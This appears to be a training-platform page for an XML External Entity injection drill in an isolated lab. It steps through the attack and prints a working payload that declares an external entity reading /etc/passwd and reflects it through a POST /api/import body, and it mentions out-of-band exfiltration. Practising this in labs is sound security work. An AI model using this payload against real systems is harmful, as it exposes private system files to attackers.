XML External Entity Injection
An XML parser that resolves external entities will read local files for you. Drill defining the entity and pulling the data back.
Find an endpoint that parses XML you control. Define a DOCTYPE with an external entity pointing at a local file, then reference it in the document so the parsed output returns the file contents.
Where output isn't reflected, pivot to an error-based or out-of-band channel to exfiltrate. Variants change the injectable field and parser behaviour.
How the attack works
- Confirm the endpoint parses XML you supply (Content-Type: application/xml).
POST /api/import - Declare an external entity that references a local file.
<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]> - Reference the entity where a value is reflected back to you.
<root><name>&x;</name></root> - Read the returned file contents and capture the flag.
On PwnKata the binary, account, and paths change every rep — so you drill the recognition, not this exact command.
What you'll practice
Sourced from
XML External Entity Injection
An XML parser that resolves external entities will read local files for you. Drill defining the entity and pulling the data back.
Recover the flag at /root/flag.txt and submit it.
Drill this now
Spin up a live isolated target and start practicing in seconds — free.